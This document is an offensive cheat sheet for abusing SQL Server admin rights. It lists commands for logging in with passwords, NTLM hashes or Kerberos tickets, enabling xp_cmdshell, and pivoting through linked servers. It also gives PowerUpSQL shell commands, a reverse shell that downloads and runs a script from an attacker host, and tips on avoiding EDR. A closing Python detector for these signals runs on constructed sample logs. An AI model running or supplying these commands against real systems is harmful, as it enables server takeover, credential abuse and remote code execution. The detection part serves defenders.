SQLAdmin

Principal has SQL admin rights on the target MSSQL instance, enabling OS command execution via xp_cmdshell.

Applies to: User → Computer (running MSSQL)


Linux Abuse

mssqlclient.py (password)

mssqlclient.py <domain>/<username>:'<password>'@<target> -windows-auth

mssqlclient.py (pass-the-hash)

mssqlclient.py -hashes :<ntlm-hash> <domain>/<username>@<target> -windows-auth

mssqlclient.py (Kerberos)

KRB5CCNAME=<ccache> mssqlclient.py -k <domain>/<username>@<target> -windows-auth

Enable xp_cmdshell and exec commands

-- Run these inside an mssqlclient.py session
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'net user';

Shortcut inside mssqlclient.py

# mssqlclient.py has built-in helper:
enable_xp_cmdshell
xp_cmdshell whoami

Get reverse shell via xp_cmdshell

# Start listener first
xp_cmdshell powershell -e <base64-encoded-payload>
# Or download and exec:
xp_cmdshell powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker-ip>/shell.ps1')"

Windows Abuse

PowerUpSQL: Invoke-SQLOSCmd

Import-Module PowerUpSQL.ps1
Invoke-SQLOSCmd -Instance <target> -Command "whoami" -RawResults

PowerUpSQL: Get a shell

Invoke-SQLOSCmd -Instance <target> -Command "powershell -e <base64-encoded-payload>"

PowerUpSQL: Enumerate instances first

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded | Where-Object {$_.Status -eq "Accessible"}

sqlcmd (built-in)

sqlcmd -S <target> -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
sqlcmd -S <target> -Q "EXEC xp_cmdshell 'whoami'"

Linked server escalation

-- Enum linked servers
SELECT * FROM sys.servers WHERE is_linked = 1;
-- Exec on linked server
EXEC ('xp_cmdshell ''whoami''') AT [<linked-server>];
-- Or via openquery
SELECT * FROM OPENQUERY([<linked-server>], 'SELECT @@version');

Opsec

  • xp_cmdshell spawns cmd.exe as a child of sqlservr.exe, which is highly visible to EDR
  • Consider using Ole Automation Procedures as alternative to xp_cmdshell
  • MSSQL logs available in SQL Server Error Log and Windows Event Log
  • Default MSSQL port: 1433; named instances may use dynamic ports (resolve them via the SQL Server Browser service on UDP 1434)
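As an added detection example (not part of this page's own commands), the following Python checks constructed Sysmon-style process-creation events and SQL Server error log lines for the two signals the Opsec notes describe: sqlservr.exe spawning a shell, and the error log recording xp_cmdshell or Ole Automation Procedures being switched on. The JSON field names, install paths and log lines are constructed assumptions, not real captures.

```python
import json
import re
from pathlib import PureWindowsPath

# Child processes a SQL Server service has no business spawning directly.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Both options grant OS execution; the error log records them being toggled.
WATCHED_OPTIONS = ("xp_cmdshell", "Ole Automation Procedures")
OPTION_RE = re.compile(
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")


def shell_from_sqlservr(event: dict) -> bool:
    """True when sqlservr.exe is the direct parent of a shell (Sysmon ID 1 / 4688 style fields)."""
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    child = PureWindowsPath(event.get("Image", "")).name.lower()
    return parent == "sqlservr.exe" and child in SHELLS


def option_enabled(errorlog_line: str):
    """Return the option name if a line records a watched option going from 0 to non-zero."""
    m = OPTION_RE.search(errorlog_line)
    if m and m["opt"] in WATCHED_OPTIONS and m["old"] == "0" and m["new"] != "0":
        return m["opt"]
    return None


def triage(process_events, errorlog_lines):
    """Run both checks over JSON process events and raw error log lines; return alert strings."""
    alerts = []
    for raw in process_events:
        ev = json.loads(raw)
        if shell_from_sqlservr(ev):
            alerts.append(f"shell from sqlservr.exe: {ev['CommandLine']} (user {ev['User']})")
    for line in errorlog_lines:
        opt = option_enabled(line)
        if opt:
            alerts.append(f"{opt} enabled: {line.strip()}")
    return alerts


# Constructed sample telemetry (assumed paths and account names, not real captures).
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SAMPLE_PROCESS_EVENTS = [
    json.dumps({"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": SQLSERVR,
                "User": r"NT Service\MSSQLSERVER", "CommandLine": "cmd.exe /c whoami"}),
    json.dumps({"Image": r"C:\Program Files\Microsoft SQL Server\150\Shared\SQLDumper.exe",
                "ParentImage": SQLSERVR, "User": r"NT Service\MSSQLSERVER", "CommandLine": "SQLDumper.exe"}),
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\dba", "CommandLine": "powershell.exe"}),
]
SAMPLE_ERRORLOG = [
    "2024-01-01 10:00:00.00 spid55 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-01-01 10:00:01.00 spid55 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-01-01 10:05:00.00 spid55 Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_PROCESS_EVENTS, SAMPLE_ERRORLOG):
        print("ALERT:", alert)
```

Only the cmd.exe child and the 0-to-1 xp_cmdshell line raise alerts; SQLDumper.exe under sqlservr.exe, the DBA's interactive PowerShell, and the option being turned back off do not.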